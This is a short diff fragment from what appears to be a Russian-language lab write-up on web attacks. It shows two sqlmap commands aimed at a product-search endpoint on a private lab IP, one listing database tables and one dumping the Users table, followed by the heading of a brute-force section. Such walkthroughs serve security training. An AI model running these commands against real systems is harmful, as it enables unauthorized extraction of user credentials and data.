@ -403,8 +403,6 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --tables
python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= -T Users --dump
```
<image src="assets/L3_36.jp">
</details>
### 2.3. Подбор пароля (Brute-force attack)